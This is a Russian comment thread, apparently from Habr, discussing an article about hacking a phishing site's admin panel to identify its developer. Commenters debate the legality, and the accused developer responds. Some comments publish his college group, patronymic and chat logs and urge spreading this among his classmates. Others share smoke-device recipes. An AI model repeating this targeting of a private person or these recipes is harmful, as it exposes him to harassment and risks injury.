Вообще, если тут есть граждане Украины, которые не боятся написать заявление в органы, то вполне можно его написать, в стиле «В сети Интернет на сайте… в статье »..." я прочел о возможных признаках преступления — кражи данных банковских карт. Прошу проверить, имело ли место нарушение закона". Написать, конечно, можно и в российские органы, но боюсь, что заграничные коллеги могут потребовать сначала что-нибудь вернуть что-нибудь отжатое в обмен на преследование преступника.
Можно вбросить ссылку на статью в группу университета Вконтакте — пусть подписчики узнают о «талантливом» одногруппнике. Как плюс, теперь ники и логины товарища хорошо гуглятся.
Ну и отдельно, конечно, поражает то, что все это вообще возможно. Вроде везде проверка паспортов, даже если ты копейки на центы поменять хочешь, к вай-фаю без номера телефона не подсоединиться, а мошенники спокойно заводят какие-то подставные счета, выводят через них деньги и остаются безнаказанными. Как так? Видимо, пока они не финансируют антиправительственные митинги, особого интереса они не вызывают.
Как я понимаю, там есть куча способов снять деньги: перевод на счет сотового телефона, вывод через ставки или казино, покупка криптовалют итд.
Ostrouschcko
Собираюсь это сделать, отпишу про результат обращения
wxmaper
Что вы… Сложно представить сколько существует интернет-магазинов, которые продают "ничего" за огромные суммы, а платежи проводят через Яндекс.Деньги. Сам однажды попался на такой в предновогодней суете. Купил "ничего" под видом видеокарты. Неладное почуял довольно быстро, спустя 2 дня, когда чисто случайно решил посмотреть сертификат сайта, а он оказывается был выдан накануне. И главное как грамотно всё было спланировано: абсолютно не вызывающий подозрений домен, ssl-сертификат, огромное количество товаров, личный кабинет с историей заказов, техническая поддержка, платежная система яндекса.
Когда я понял, что я — лох, сразу сообщил в яндекс о мошеннической схеме через их платежку со всеми собранными сведениями: о том, что магазин не существует физически, а по указанному адресу расположен совершенно другой магазин; о том, что приложенные свидетельства и документы на сайте вообще не относятся к деятельности магазина, а принадлежат другим юридическим лицам/фирмам.
Ответ яндекса не заставил ждать, он был в духе: "Да, мы видим ваш платёж, но вернуть деньги не можем, т.к. они уже потрачены на приобретение других услуг Яндекса.". После моего обращения в Яндекс, сайт с их платежкой проработал еще несколько недель, а счет мошенников даже не был заблокирован и они преспокойно продолжали принимать платежи (да, я проверял форму ввода данных о карте, она работала). И сколько человек еще было обокрадено, прежде чем счет был заблокирован? Никто этого не узнает.
submagic
Жаловаться хостеру и регистратору домена. Возможно, в РосКомНадзор. Заявление в полицию. Все должны знать, куда (кроме них) ещё ушла жалоба. Но это дело хлопотное. Заявление в полицию — это, скорее всего, ещё как минимум пара вызовов для дачи показаний. Нужно быть готовым «дожимать» ситуацию, тратить на это ресурсы.
Вообще же ХОРОШО сделанные клоны магазинов встречаются часто, да. Не знаю, как сейчас — но раньше даже давали ссылку на раздел настоящего магазина в Яндекс.Маркете (типа, смотрите, у нас пять звёзд, ага). Тогда, несколько лет назад, несовпадение доменных имён на основании информации из раздела было неочевидно (да и сейчас можно взять визуально очень похожее).
wxmaper
Я в тот день написал жалобу везде где можно: яндексу, регистратору домена, в РПН, в прокуратуру, в какой-то отдел it-преступлений (точного названия не помню). На счет хостера не помню, скорее всего я на него не вышел.
Именно так и было. Меня даже попросили принести 2ндфл, а когда следователь (девушка) увидела зарплату за последний месяц, округлила глаза: "И вы жалуетесь на кражу 10 тысяч рублей?". Реакция меня прям в шок повергла. Т.е. если я когда-то получал нормальную зарплату, то жаловаться на преступников, обобравших меня — это прямо как-то низко с моей стороны.
submagic
Отечественных хостеров неплохо определяет известный 2ip.ru/guess-hosting
wxmaper
В этом-то и проблема! Ответственность за финансовые преступления должна лежать на тех, кто получает зарплату за то, чтобы эти преступления не совершались.
Не смогли пресечь преступление? Виновны.
Не смогли устранить последствия (найти виновников и вернуть украденное) — виновны дважды.
А то как получается: люди платят налоги, чтобы обеспечить работу всех этих ведомств, созданных защищать нас, а они работу свою не выполняют и зарплату получают исправно и в полном объёме.
Самый первый и ответственный шаг должны были сделать сотрудники безопасности Яндекса, они, когда согласились с тем, что имеются признаки мошенничества, могли приостановить транзакции, но этого не было сделано.
Вообще вся эта система дырявая. Как пример — телефонные мошенники со своими смс-ками "вам зачислено 100 рублей". Когда сообщаешь оператору о мошенничестве, они просто блокируют номер. Всё. Дальше никто ничего не делает.
Почему операторы не инициируют процесс поимки преступника? Ведь мошенник использовал их сервисы. Им проще всего: они уже знают на кого зарегистрирована сим-карта (могут и не знать, да), они могут отследить где примерно карта была активирована, когда была активирована, где была активность этой карты. Могут отследить трафик, проанализировать записи разговоров, посмотреть на какие счета переводились деньги и т.д. и т.п. Во всяком случае они могут не делать всего этого сами, они могут просто передать архив данных в соответствующие органы, но вместо этого они говорят: "Вы можете самостоятельно написать заявление в прокуратуру для возбуждения дела". Но по факту я не являюсь жертвой, ведь я не передал деньги преступнику. С чем я должен обращаться в органы? С тем что меня пытались обмануть, но ничего не вышло. Ну не вышло и не вышло, такое дело даже рассматривать не станут.
Жертва тут — оператор, чьими услугами воспользовались, чтобы осуществлять незаконную деятельность. Но им пофиг, с них не убудет, они свой процентик за переводы получают и ладно. Так быть не должно.
С Яндексом аналогично, только они даже не посчитали нужным вовремя заблокировать счет.
McDermott
Хостер и регистратор (по крайней мере, reg.ru) будут блокировать сайт только в результате обращения из полиции (из личного опыта).
S-trace
И это хорошо!(с)
lubezniy
Ну, SSL-сертификат сейчас, в эпоху Let's Encrypt, не сказать чтобы является критерием подозрительности (если, конечно, он был выдан их CA): перевыпускаются они в штатном режиме достаточно часто. А вот документы магазина проверять не мешает.
wxmaper
Я не сильно разбираюсь в этом, но вроде это был не Let's Encrypt.
VSOP_juDGe
Меня яндекс также послал (в полицию), когда мне продали левый ключ от игры, однако удалось вернуть деньги через мой банк (Тинькофф). С тех пор предпочитаю не покупать в онлайн-магазинах, которые принимают оплату через яндекс деньги.
empy26
На сайте киберполиции Украины создал обращение о возможном правонарушении со ссылкой на статью. Сомневаюсь конечно что от этого будет какой то толк, но все же.
coderisimo
А что мешает злоумышленникам прицепить https и «принимать платежи» на «безопасной странице»? )
dmitrmax
Жадность и лень, видимо)
sumanai
Жадность поставить бесплатный сертификат?
dmitrmax
Жадность купить платный. Лень разобраться с let's encrypt.
mafia8
Включил let's encrypt в панели управления Direct admin.
JerleShannara
А есть и такие клованы, только сам шлюз у них смешной слишком.
Zmiy666
Сейчас кредитную карту вообще опасно доставать. Чисто случайно нашел в открытом доступе архив видео с камер наблюдений мелкого супермаркета… 3 камеры стояли над кассами и снимали их крупным планом — разрешения камер хватало, чтоб прекрасно видеть номер карты, которой оплачивают покупки а так же имя и прочие данные. И некоторые покупатели крутили ей, когда вставляли в ридер. Так что код тоже прекрасно был видим. Конечно процент таких покупателей весьма невелик — многие платили наличкой, но из любопытства я смог выцепить на видео 4 карты со всеми данными, отсмотрев примерно 3 часа с промотками… Поскольку такие камеры есть везде, почти в любом магазине — это мягко говоря напрягает… хрен его знает, где потом это видео всплывет, ведь оно обычно никак не защищено. Это песец, товарищи ((
А в интернете если где-то плачу — предпочитаю использовать одноразовые виртуальные кредитки.
ClearAirTurbulence
«крутили ей, когда вставляли в ридер. Так что код тоже прекрасно был видим»
Берется пломбировочная наклейка, наклеивается на код, если просвечивает — дополнительно уже на ней маркером закрашивается место.
Можете даже официанту ее после этого отдать (хотя сейчас уже практически неактуально, они обычно с терминалом приходят), сразу будет видна попытка отклеить, если она, конечно, будет предприниматься.
xirahai
Я например с момента получения карты, сразу соскреб CVC код и нарисовал вместо него другие цифры.
qwertyqwerty
Прошитому терминалу похрен. Дамп есть.
Speakus
Дамп есть если только платить магнитной полосой. А её можно и размагнитить.
vladkorotnev
Чтобы потом приехать в какую-нибудь страну типа Японии и остаться без возможности платить карточкой совсем :-)
mkll
Если у вас одна-единственная карта на все случаи жизни, то это, мягко говоря, непредусмотрительно.
dmitrmax
Резюме: какер погорел на том, что не настроил let's encrypt на фишинговом сайте )))
Но автору все равно респект. Прочитал с большим удовольствием )
shalm
Статья интересная, идти в органы не стоит, они сами должны такие статьи на популярных ресурсах находить и изучать и добытую информацию и как надо работать
Koneru
Юра, перелогинься!
Elmot
А вот интересно, можно им туда honeypot карточек в базу напихать?
rpiontik
Нормальное, такое, романтическое свидание вышло. Девушка осталась довольна? :)
dmitrmax
Как в известном анекдоте:
Nine_Red
Вот так обострённое чувство справедливости и человеческая порядочность привели человека на путь white hat. Надеюсь, что «Продолжение следует», как нам сообщил автор.
pyrk2142
С таким White Hat может быть очень грустное продолжение (достаточно маловероятное, но реальное): если данные этих карт будут использованы для мошенничества или кражи денег (что особенно неприятно), то влететь может автору: он имел доступ к этим данным, повзаимодействал с ними, сохранил их, плюс искать его может быть проще, чем создателей сайта.
Incomer
Я так понял, что это украинцы безобразничают?
Soniclev
Юра уже удалил страницу ВКонтакте
dmitrmax
Штирлитц еще никогда не был так близко к провалу!
Gelloiss
еще вчера, через пару часов после публикации этой статьи. Слишком много гневных смс поступило)
fukkit2
Мда, автор…
Улов у тебя — ерши сопливые.
Методы твои — незаконные.
Статейку лучше удали, от греха.
fukkit2
Кулхацкеры и неуловимые аноны негодуют. Однако, дружеский совет остается в силе.
S-trace
Слив защитан)
Gelloiss
Статья классная и проделана реально хорошая работа, мне нравится)
Но есть один нюанс. Я не создатель и даже не участник этой группы.
Ко мне поступил заказ на zismo.biz, довольно давно, кстати и я его просто выполнил.
Сам заказ был в том, чтобы перенести их сайт с тильды на «свой хостинг» и написать простую админку для публикации фильмов и тп. Никаких карт не было, оплата у них была через яндекс, так что я и не знал, что они мошенники. Бот использовался для оповещений о новых заказах, поставил со своего аккаунта, ибо так было проще.
Все мои переписки с ними сохранились и в случае чего я смогу их показать.
Просто видимо сайт переделали. К тому же, там ссылка на меня была не только в админке, но и на главной. Если тс ее не увидел, то мб и ее убрали.
Если есть какие-то вопросы — пишите, отвечу)
misery-hacker Автор
Принадлежит ли сайт gelloiss.ru Вам?
Gelloiss
Да. Можете перейти на сайт из поста, для удостоверения в этом)
(Именно с поста, вручную вводить в строку не выйдет)
misery-hacker Автор
Принадлежит ли telegram аккаунт gelloiss Вам в настоящее время?
Gelloiss
У Вас же это в статье есть. Я просто говорю, что не связан с заказчиками никак кроме «выполнил, установил все и настроил, отдал сайт». Иногда фиксил баги поначалу. Да и я не знал, для каких конкретно целей сайт будет использоваться.
Обвинять меня в краже персональных данных неправильно.
misery-hacker Автор
Это еще предстоит выяснить.
Если я правильно Вас понял, то Вы утверждаете, что получали ФИО, номера телефонов, номера банковских карт в свой телеграмм, но не знали для каких целей они используются?
Gelloiss
Лично я не получал ничего. Бот, созданный от моего аккаунта, мог отправлять что угодно и кому угодно, т.к. токен был не у одного заказчика.
Сейчас токен сменен и никто ничего от него отправлять больше не будет.
Space__Elf
Хорошо — я вам верю.
Сможете ли убедить автора статьи?
Gelloiss
А надо ли? Здесь лучше убедить кого-то другого, т.к. автор статьи явно нарушил несколько статей. Как минимум: pravo.rg.ru/rubrics/question/3446
Если мне надо будет кого-то убедить в своей невиновности, то это точно будет не ТС. Ну и если надо будет, то сделаю) У меня все переписки сохранены с заказчиками. Доступов и сохраненных карт или чего-то подобного тоже нет, так что проблем пока не вижу.
S-trace
>У меня все переписки сохранены с заказчиками.
А вы сможете неоспоримо доказать при необходимости (не будем обсуждать при какой именно), что все эти сохранённые переписки действительно имели место в реальности?
misery-hacker Автор
Я бы поверил, если бы не диалог в telegram. Уверен, вы прекрасно знали для каких целей используется созданный Вами сайт.
Извините за вид, сохранился только дамп:
Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\nТипа этого?)) \nДанные в телегу приходят', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ? это платежная система для тех, кто зарабатывает в интернете. Электронный кошелек, прием платежей и вывод денег, денежные переводы. Мгновенная регистрация, выгодные комиссии.', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | Электронный кошелек, платежи, прием и вывод денежных средств', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Gelloiss
Не знал.
Со слов заказчика moneyonline, сайт использовался для перепродажи товаров. Т.е. у него заказывали банк. карты, он получал оплату и заказывал дешевле в других местах.
Также и Вы при заказе не уточняли с какой целью Вам нужен сайт. Это не единичный случай, когда люди просят написать какую-то подобную платежку, потому что не могут или не выгодно связываться с официальными, при этом они никого «не кидают на деньги».
В статье Вы обвиняете меня в том, что я лично собирал данные карт, снимал с них деньги и т.д. Но нет, я лишь написал сайт на заказ и все. Вы не нашли никаких реальных мошенников, и даже то, что Вы вышли на меня не позволит найти их, ведь все, что у меня есть — аккаунты телеграмма, два из которых уже удалены.
Вы же не станете обвинять фирму, создавшую интернет магазин, который отправляет, например, подделку? Нет, ведь фирма к этому никакого отношения не имеет.
Также и у меня. При том, после статьи, я сразу отключил бота и он больше не сможет отправлять заказчикам данные, потому что я не хочу быть замешан в этом.
walkman7
Юрий Андреевич, так ты даже в своем колледже (ХПКК група П-51) внаглую обманываешь преподавателя и сам же это постишь pikabu.ru/story/kak_otvetit_prepodu_ne_vyigovarivaya_ni_zvuka_6639791 или это не ты? Или же ты думаешь что Панченко будет вместо тебя будет отвечать и дальше?
Со слов заказчика говоришь, как то очень быстро «твой» заказчик подчистил сайт…
Gelloiss
Лол, давайте сюда еще забавную ситуацию приплетем с колледжа?)))
А Вы никогда не говорили преподавателю, что заболели или проспали, когда на самом деле просто было лень идти? И что, Вы теперь тоже обманщик и будущий преступник? Кстати, это не Кривошеев…
Я отключил бота и заказчик заинтересовался этим, прочел статью. Причину отключения сайта не знаю. Могу предположить, что на него обрушилось большое количество гневных писем.
lubezniy
PCI DSS? Законодательство (украинское тоже) по противодействию отмыванию денег? Как в этих условиях в принципе что-то обналичивать? Неа, не слышал и не думал…
Gelloiss
Этот вопрос адресован мне? Если да, то, извини, не понял вопроса.
Ghool
Парой комментов выше была оплата по яндексу, теперь отправка платёжных данных в телегу
Для каких вообще легальных действий может понадобиться отправка платёжных данных клиента в телегу?
Gelloiss
Здесь речь шла о двух разных сайтах.
И я же описал для каких. Ну так мне говорили. Я сильно не расспрашивал. Есть работа, делаю.
Исключения были, когда заранее 100% понимаю, что черная тема.
edogs
То что данные уходят в 3rd-party контору? Так это достаточно частая практика, у нас заказы бывают и в скайп посылать и по смс и даже просто в личку на другой форум. Не очень безопасно, но никак не уголовно.
То что данные уходят в открытом виде и полностью, а не перекидывает на оплату на сайт банка сразу? Это тоже частая ситуация, когда процессинг наполовину ручной. Те же агрегаторы продажи авиабилетов или букинг (мы где-то писали выше), они в момент непосредственной покупки у поставщика вводят эти клиентские данные и они им нужны полностью у себя что бы их ввести. Опять же, не очень безопасно, но вряд ли уголовно.
Понимаете в чем штука. Проблема со всеми мошенниками в том, что для своей эффективной деятельности они максимально маскируются под честные методы ведения бизнеса. Поэтому в подавляющем большинстве случаев, если мошенник не идиот, 99% его действий объясняется в рамках сложившейся деловой практики, пусть даже она несколько сомнительна в плане безопасности и белости.
Ghool
Вы так и не ответили, зачем это нужно.
Если нужно просто хранить данные карты клиента, что бы ему было удобнее — тогда должен быть вопрос, нужно ли сохранять карту
и при этом не нужно хранить (знаю, что это не панацея, но всё же)
S-trace
Международные платёжные системы очень жёстко регулируют, какие данные и какие их клиенты (зависит от уровня сертификации клиента) могут сохранять. И сохранение ВСЕХ данных карты в открытом виде стоит нереально дорого, и поэтому не применяется честными сайтами (практически все честные сайты пользуются сертифицированными крупными платёжными агрегаторами)
mishast
Для хранения данных карты нужна сертификация PCI DSS, просто так по желанию левой ноги это не делается.
Areso
Booking.com с отельерами тоже об этом знают, или нет?
Vilgelm
В принципе можно придумать такие схемы. Например, дропшиппинг, если дропшиппер очень хочет сэкономить (типа получает заказ, потом с карты клиента на его адрес покупает на Aliexpress). Но что-то я сомневаюсь, что это распространенный сценарий.
Ghool
… если дропшиппер очень хочет сэкономить, получает заказ и данные кредитки, и потом просто снимает с неё деньги
Vilgelm
100% экономия. Но я о том, что можно придумать легальные способы использования данных подобным образом. Они маловероятны, но придумать можно.
Ghool
Ага.
Но можно уже не придумывать, в соседней ветке выложили скрины, где объект исследования прямо предлагает фишинговые сайты на продажу
dmitrmax
А чё теперь на хабре коменты писать может любой, кто просто зарегается?
nidalee
Да.
dmitrmax
Видимо и минусить теперь тоже могут, раз за такой вопрос уже минусят )
При Билли Гейтсе такого не было!
Gelloiss
Нет, не могут.
А комменты лишь после модерации появляются.
nidalee
Писать-то могут. Публикует либо автор, либо (вроде как) модератор. Раньше вы бы при желании ничего не написали, и никто бы волшебную кнопку не нажал.
Gelloiss
Какую кнопку?
nidalee
Которая опубликует ваш комментарий для широкой публики, не только автора поста и администрации.
progman_rus
А это марсиане продавали фишинговый сайт от вашего имени?
PS просто из любопытства — сон нормальный? Не страшно по улице ходить?
Gelloiss
Посмотрите на дату. Посмотрите на мой последний визит и вообще время проведенное на том форуме.
Честно, я до этого поста и забыл об этом. На идею меня толкнул одноклассник (Да, я тогда еще был классе в 8), типа пошутить над другом. Потом решил попробовать вдруг получится продать, может кому надо))
Было продано 0 копий, ни один аккаунт не пострадал.
progman_rus
Ничего себе шуточки… лет на семь строгого режима.
Мы в восьмом классе по другому шутили. Карбид в лужу, дымовушку из селитры в женский туалет в школе кинуть.
apanasenko
Ничего себе шуточки… лет на семь строгого режима или сколько там за изготовление взрывчатых веществ?
progman_rus
эх молодо зелено… пищевая сода + аммиачная ( можно и натриевая, но она хуже дымит ) селитра + горячая вода. Замачивать газету в этом растворе, потом сушить на батареи. Потом свернуть в плотную трубочку и обмотать фольгой.
это не ВВ, просто дымит прикольно.
А в моем детстве селитра свободно продавалась в промтоварах для огородников.
tvr
Гидроперит+фиксаж = много дыма.
submagic
А разве фиксаж всё ещё продаётся?
Давайте уж по-взрослому:
coollib.net/b/212132/read
Meklon
Замени на анальгин) Из той же аптеки) Воняет жутко только.
S-trace
В этом то и прикол)
А реакция начинается после пары-тройки минут на батарее (или в любом другом тёплом месте))
MacIn
Или минут 15 просто при комнатной температуре :D Эх, школа…
progman_rus
Магазин фототоваров был на другом конце города. А промтовары в 10 минутах.
Еще ближе был магазин музыкальных товаров где продавались гитарные медиаторы 2 штуки за копейку. Мы их мелко резали и в бумажку, если поджечь то тоже много дыма.
tvr
А если в фольгу то и ещё летающего по непредсказуемой траектории.
somatiq
А если в обёртке из фольги сделать хвостик для выхода дыма\газов, то даже и по достаточно предсказуемой.
apanasenko
сарказм не прошел :(
Но вообщем у каждого поколения свою «шуточки» на грани фола и не понятны предыдущему.
alsoijw
Почему опровдания о незаконности есть, а извенений за дыры в коде нет? ?(???)?
Непростительно ((+???))
Профиль скрыт из любви к искусству, или знаком с другим деаноном?
Gelloiss
Не до извинений было, сори.
Господи, вопрос про профиль, это вообще что-то забавное. Вам по кайфу все искать обо мне?))
Профиль скрыт, ибо это по дефолту, походу. Ну точно не специально. И вообще я шиккикомори пользовался месяца два максимум, ибо неудобно мне каждый раз помечать какие-то анимешки… Не вижу в этом смысла. Смотрю и смотрю)
alsoijw
Gelloiss
У нас очень хороший колледж, где преподают лишь современную информацию.
Зачем учить защите в пхп, если можно установить вп, где все уже защитили за тебя?
alsoijw
Чем вам так преподаватели насолили, что вы им тут такую антирекламу делаете? Уже б сказали что прогуливали занятия…
Rsa97
Вы таки хотели сказать «где все дыры сделали за тебя»?
На WordPress приходится около 75% взломов всех CMS.
jok40
У Вас есть опыт взлома WP через его «дыры»?
Vilgelm
Справедливости ради скорее всего это из-за его популярности. Там теперь автообновления безопасности есть, так что все не так уж и плохо.
Cheater
На ваш коммент хочется повесить золотую табличку «Весь уровень подобных учебных заведений в двух фразах».
У нас очень хороший колледж, где преподают лишь современную информацию. Зачем учить защите в пхп, если можно установить вп, где все уже защитили за тебя?
submagic
Сначала прочитал как «Латентно-компьютерный колледж». Даже не удивился.
Cheater
del
sleonov
Все это похоже на проведение оперативно-розыскных мероприятий. А вот список органов власти, кто может осуществлять такую деятельность: Органы внутренних дел Российской Федерации, Органы федеральной службы безопасности, Федеральный орган исполнительной власти в области государственной охраны, Таможенные органы Российской Федерации
Служба внешней разведки Российской Федерации.
Все это регламентируется Федеральным законом «Об оперативно-розыскной деятельности»
от 12 августа 1995 года N 144-ФЗ, принятым Государственной Думой 5 июля 1995 года
(в ред. Федеральных законов от 18.07.1997 N 101-ФЗ,
от 21.07.1998 N 117-ФЗ, от 05.01.1999 N 6-ФЗ,
от 30.12.1999 N 225-ФЗ, от 20.03.2001 N 26-ФЗ,
от 10.01.2003 N 15-ФЗ, от 30.06.2003 N 86-ФЗ,
от 29.06.2004 N 58-ФЗ, от 22.08.2004 N 122-ФЗ,
от 02.12.2005 N 150-ФЗ, от 24.07.2007 N 211-ФЗ,
от 24.07.2007 N 214-ФЗ, от 29.04.2008 N 58-ФЗ,
от 22.12.2008 N 272-ФЗ, от 25.12.2008 N 280-ФЗ,
от 26.12.2008 N 293-ФЗ, от 28.12.2010 N 404-ФЗ,
от 21.11.2011 N 329-ФЗ, от 08.12.2011 N 424-ФЗ)
Т.е. автор, своими действиями и публикацией — нарушил все вот это вот вышеперечисленное :)
Javian
Смотрим на это с другой стороны. Аноним misery-hacker разместил на хабре статью.
Петр Иванов прочитал и на сайте генпрокуратуры написал обращение «Я, Петр Иванов, прочитал статью „Как я хакера ловил“ по адресу habr.com/ru/post/448810
В статье содержится информация о преступлении.
Прошу провести проверку изложенных фактов.»
Будет ли прокуратуру интересовать личность misery-hacker так чтобы попытаться его найти?
acyp
Скорее всего да, т.к. действия Gelloiss еще надо квалифицировать (тем более, что в «свободном общении» он факт умысла отвергает), а вот misery-hacker прямо в полный рост расписал осуществление преступного умысла. И сам умысел "… на блюдечке с голубой каемочкой..." преподнес. Я так и вижу формулировку: "… руководствуясь мотивом мести, из хулиганских побуждений, осознавая противоправность деяния ..."
dmitrmax
А что? Заявление от пострадавшего от действий взломщика совсем не нужно?
acyp
Нет. Javian очень корректно сформулировал:
По действующим нормам о преступлении может сообщить любой гражданин.Rsa97
Не требуется. УПК РФ ст.21.2:
Аналогичная статья есть в КоАП РФ (ст. 28.1.1.1). Заявление требуется только в гражданско-правовых отношениях.lubezniy
Уголовные дела публичного обвинения (перечень статей есть в УПК) могут возбуждаться без заявления потерпевшего.
NoRegrets
Не надо пугать. Для привлечения по любой статье нужно доказать злой умысел, в т.ч. и для привлечения по 272 статье «неправомерный доступ». Это — единственное, за что здесь можно привлечь. Прокурур, если дело дойдет до суда, вспотеет, доказывая злой умысел во фразе «с целью установления личности злоумышленника и пресечения его деятельности, я принялся изучать сайт...». А адвокату всего лишь придется помахать этой статьей, которая ясно говорит, что никакого умысла у misery-hacker не было. Следователь, осознавая всю бесперспективность этой затеи, даже дела открывать не будет, а если и откроет по заявлению, закроет «за отсутствием состава преступления».
acyp
и не планировал пугать, а только рассуждал, полагаясь на здравый смысл и некоторое знание системы.
1. очень много зависит от того как происходящее преподнесут в заявлении.
2. много зависит и от ответа самих участников (или их адвокатов). но при этом надо помнить, что на стадии доследственной проверки адвокат может быть только в одном случае: если заранее заключен договор…
3. факт «взлома» ака «несанкционированного доступа к чуствительной информации» через уязвимость к «админке» расписал никто иной как мистери-хакер. причем со всеми подробностями.
зря вы ссылаетесь на «злой умысел», нет такого в подзаконных документах. есть «умысел на совершение противоправных действий», злой он или добрый это уже следствию и суду разбираться. а умысел есть, да с реализацией.
я не «за охотника либо медведя». я против человеческой глупости и незнания норм и правил.
и не думаю, что есть необходимость продолжать, ибо все в руках Богов Великого Рандома.
Но ТС знатно подставился, это факт.
pyrk2142
Очень сильно поддержу этот комментарий: как минимум, я был бы рад (относительно), если бы написание фразы «В исследовательских целях», «Для поиска злоумышленника» защищало бы исследователей и энтузиастов. Но боюсь, что в реальности это не так просто.
Отдельный вопрос в следующем: автор явно сначала сделал то, что описано в статье, а потом уже написал ее. Поэтому я подозреваю, что вполне возможно рассуждение вида «Была использована уязвимость в сервисе, получен доступ к данным карт, потом была написана статья, где в целях оправдания себя было указано, что это сделано для поиска злоумышленника.» Понятно, что я почти не верю в реальность того, что написано в кавычках, но в судах и в следственных органах работают другие люди, которые могут воспринять все иначе.
alsoijw
alsoijw
misery-hacker, бекапы уничтожил?
Kordamon
А какими законами РФ регламентируется такая деятельность вне территории РФ и не по отношению к гражданам РФ?
Dasyo
Интересно почитать. Про и дилетант.
stantum
Я там вижу раздел «Адреса». Люди вводят свой email? Можно сделать «краудфандинг», разослав эту статью пострадавшим. А они уж сами придумают, как его наказать.
Dagnir
В первую очередь надо предупредить, что карту надо заблокировать.
submagic
Да, именно так. И чтобы вообще поменяли всё, что только можно. А то имея часть информации о человеке почти всегда можно на основании этой части собрать ещё. И ещё. И ещё. И так пока, действительно, даже кража личности не станет вполне реализуемой.
sumanai
ФИО? Вообще, бесит современный мир, где ФИО требуют где попало, а сменить их весьма сложно.
submagic
Ну, ФИО, конечно, поменять непросто. Но сейчас некоторые и это ухитряются делать См. недавние новости о всяких-разных личностях, ранее попадавшихся на противоправных действиях, а потом сменивших как минимум фамилию и подавшихся кто куда (некоторые даже в чиновники пролезли). Но если речь о карточках — имеет смысл как минимум перевыпустить карту, поменяв кодовое слово (а лучше и привязанный номер телефона), я так полагаю.
Rsa97
Где как. Вот человек, который 23 раза за 9 лет менял ФИО.
Groosha
У Вас ссылка битая (в конце URL добавился лишний http://). Вот правильная
lxsmkv
Сайт использует незащищенное соединение для сбора конфиденциальных данных. Это технический дилетантизм, неправильно, и все такое, но не наказуемо. Сайт отказал в предоставлении услуги или предоставлении услуги в другой форме. Жаль, но имеет право.
А намеренно взламывать сайт с целью получение доступа к личной информации, без санкций — преступление.
Пока что это выглядит со стороны так: «меня послали — я взломал»:
И стилистический ключ повествования не технически-простветительский — вы не раскрываете практически никакого «ноу хау», только найденную информацию, а «смотри как надо гопарей наказывать». Значит, в первую очередь целью было раскрытие личной информации предположительных «злоумышленников».
А по закону, злоумышленники они или нет должен решать суд.
Лучше было бы сделать статью о том, как пользователь сам может определить сайты с недостаточно безопасной обработкой пользовательских данных. Или как сделать надежную платежку. Людям было бы имхо больше пользы.
Я бы статью через модерацию не пропустил, именно из-за отстуствия технической, либо общественно-полезной направленности. Хабр не место для слива личной информации. Для этого есть викиликс и пр.
alsoijw
lxsmkv
Ну вся зацепка — это удачная sql иньекция на админке. Все остальное — расследование, которое итак любой сможет провести. А в основном идет раскрытие конфиденциальной информации.
Кроме всего тут присутствует «систематическая ошибка выжившего». Статью пишут только про удачный случай. Таких как правило меньше чем неудачных. Про них просто не пишут.
Даже если считать, что статья про ИБ, то контекст применения этих знаний, мотивация, в данном случае по меньшей мере сомнительны.
Gelloiss
Угу, и результат всего расследования — найти разработчика, который и так указан в футере сайта =_=
submagic
Ну, вообще-то, ещё и оценить его причастность к некоторым действиям (правильно или нет, уже другой вопрос, но всё же именно так).
submagic
alsoijw
Gelloiss бы не смог. Лично я бы тоже не смог, так как не хожу в кино и у меня нет времени задерживаться на сомнительных сайтах (? ?•???•? ?)
А почему они неудачные? Не потому ли, что их авторы подумали о защите?
Переиначу известное выражение: «Знания не пахнут».
Знания очевидны когда ты их знаешь. Но просто взять и передать знания, как передают книгу, нельзя. Их нужно собрать самому. Если человек ходит(ходил?) в ВУЗ и не знал этого, то что говорить про самоучек? Я уверен, что php и через 20 лет, если будет существовать, будет позволять сделать подобную инъекцию. Даже в каком-то C# вполне возможно придётся запросы писать руками.
mkll
В этом году — 31 год червю Моррисона. При этом используемый в нем метод атаки (переполнение буфера) — живее все живых.
Так что, скорее всего, вы правы.
submagic
alexandrtovmach
Давайте ка зайдём с другой стороны?
Не сомневаетесь ли вы в реальности аккаунта автора статьи?
Вполне вероятно что это мой СПГС, но если автор статьи является тем же Gelloiss, который просто опубликовал хайповый материао, со взломом самого себя, используя новый аккаунт?
alsoijw
Информацию о взломе лучше всего публиковать с анонимного аккаунта, так как доблесные защитники закона могут повязать. Тем более, что на сервере могли остаться его следы.
А что ему на себя заявление за взлом писать?
Если уж искать тайный глубокий смысл, то тогда зачем себя компрометировать во-первых как профессионала, во-вторых возможно как мошенника?
seri0shka
Интересно, а можно ли подобным образом «поймать» других людей, чтобы выразить им бесконечную признательность за созданное ими.
На полном серьёзе, я уже давно хочу узнать имя автора произведения (незаконченного, к сожалению) Сиамский вояж Степаныча, заодно хотелось бы узнать причину столь внезапного конца, на продолжение уж давно не надеюсь.
Так же хотелось бы узнать о судьбе автора форума Пультоскоп на Arduino 27МГц под ником bodriy2014, который сделал доступным для тысяч любителей довольно нужного и функционального устройства, да и просто мотивировал народ на самосовершенствование. Что-то подсказывает, что человека, возможно, уже нет среди живых, но был бы рад узнать, что ошибаюсь.
Страна должна знать своих героев.
lagranzh
Приключенческая новогодняя комедия по мотивам рассказа Дмитрия Васильева, опубликованного на форуме Сергея Винского.
seri0shka
Гуглом пользоваться я умею. Даже имя автора вызывает некоторые сомнения, не говоря о том, что больше ничего не известно. В своё время я копал глубже, вроде автор под ником каким-то писал.
lagranzh
Ну извините. В любом случае, спасибо за наводку. Давно так не смеялся.
mukoladerevlo
на скрине есть .well-known/, папка для certbot не так ли? не доустановили сертификат до конца, фатальная ошибка которая запустила цепную реакцию?
Статья огонь) поражают комменты что тс нарушил кучу законов)
